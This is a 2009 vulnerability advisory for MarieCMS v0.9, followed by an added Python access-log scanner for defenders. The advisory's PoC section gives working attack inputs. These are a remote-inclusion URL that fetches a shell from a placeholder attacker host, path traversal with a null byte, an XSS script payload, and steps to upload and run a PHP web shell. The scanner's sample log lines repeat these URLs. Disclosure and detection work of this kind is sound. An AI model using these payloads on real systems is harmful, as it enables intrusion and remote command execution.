MarieCMS 0.9 LFI RFI XSS

2009.12.09
Credit: Amol Naik
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################################################
Multiple Vulnerabilities in MarieCMS v0.9

Name              Multiple vulnerabilities in MarieCMS
Systems Affected  MarieCMS v0.9
Download          http://sourceforge.net/projects/mariecms/files/MarieCMS/MarieCMS%200.9/mariecmsv0.9.zip/download
Author            Amol Naik (amolnaik4[at]gmail.com)
Date              07/12/2009
################################################################################

############
OVERVIEW
############
MarieCMS v0.9 is vulnerable to the following issues:
++ Remote File Inclusion
++ Local File Inclusion
++ Persistent XSS
++ Shell Upload (Authenticated User)

######################
PoC
######################

# Remote File Inclusion:
++++++++++++++++++++++++
http://localhost/mariecms/?page=http://[attacker]/[site]/shell.txt?

# Local File Inclusion:
+++++++++++++++++++++++
http://localhost/mariecms/?mod=../../../../../../../../../../boot.ini%00
http://localhost/mariecms/admin/index.php?mod=../../../../../../../../../../../../boot.ini%00

# Persistent XSS:
+++++++++++++++++
Put <script>alert("XSS")</script> in "Name" field on page
http://localhost/mariecms/?page=addgb&mod=gaestebuch

# Shell Upload (Authenticated User):
+++++++++++++++
1. Rename shell.php to shell.jpg.php
2. Upload it into galleryupload section.
3. View images to get image id for shell.jpg.php
4. Access shell: http://[server]/[path]/_images/[image_id].php?cmd=dir

############
TimeLine
############
Bug discovered    : 26/11/2009
Informed Vendor   : 30/11/2009 -- No reply received from vendor till the date
Public Disclosure : 02/12/2009
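
A defender-side check for the request patterns in the PoC section above, added here as an example (it is not part of the advisory or of MarieCMS): it flags access-log request lines where `page` or `mod` carries a URL, a traversal segment or a NUL byte, and requests for a `.php` file under `_images/`. The function names, finding labels and sample log lines are constructed for illustration; the persistent XSS case is not covered here.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

INCLUDE_PARAMS = {"page", "mod"}   # parameters used in the advisory's PoC URLs
SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)         # value is a URL
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")             # ../ or ..\ segment
UPLOADED_SCRIPT = re.compile(r"/_images/[^/]+\.php$", re.I)   # script in image dir

def classify(request_line):
    """Return sorted findings for one 'METHOD target HTTP/x' access-log field."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return ["malformed"]
    try:
        target = urlsplit(parts[1])
    except ValueError:             # e.g. broken bracketed host in the target
        return ["malformed"]
    findings = set()
    if UPLOADED_SCRIPT.search(unquote(target.path)):
        findings.add("script-in-upload-dir")
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name.lower() not in INCLUDE_PARAMS:
            continue
        value = unquote(value)     # second decode catches double-encoded input
        if SCHEME.match(value):
            findings.add("rfi")
        if "\x00" in value:
            findings.add("null-byte")
        if TRAVERSAL.search(value):
            findings.add("lfi-traversal")
    return sorted(findings)

def scan(lines):
    """Map each suspicious request line to its findings."""
    return {ln: hits for ln in lines if (hits := classify(ln))}

# Constructed sample log lines; 198.51.100.7 is a documentation address.
SAMPLE = [
    "GET /mariecms/?page=addgb&mod=gaestebuch HTTP/1.1",
    "GET /mariecms/?page=http://198.51.100.7/a/b.txt? HTTP/1.1",
    "GET /mariecms/admin/index.php?mod=../../../../boot.ini%00 HTTP/1.1",
    "GET /mariecms/_images/17.php?cmd=dir HTTP/1.1",
    "GET /mariecms/_images/17.jpg HTTP/1.1",
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE).items():
        print(", ".join(hits), "<-", line)
```
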

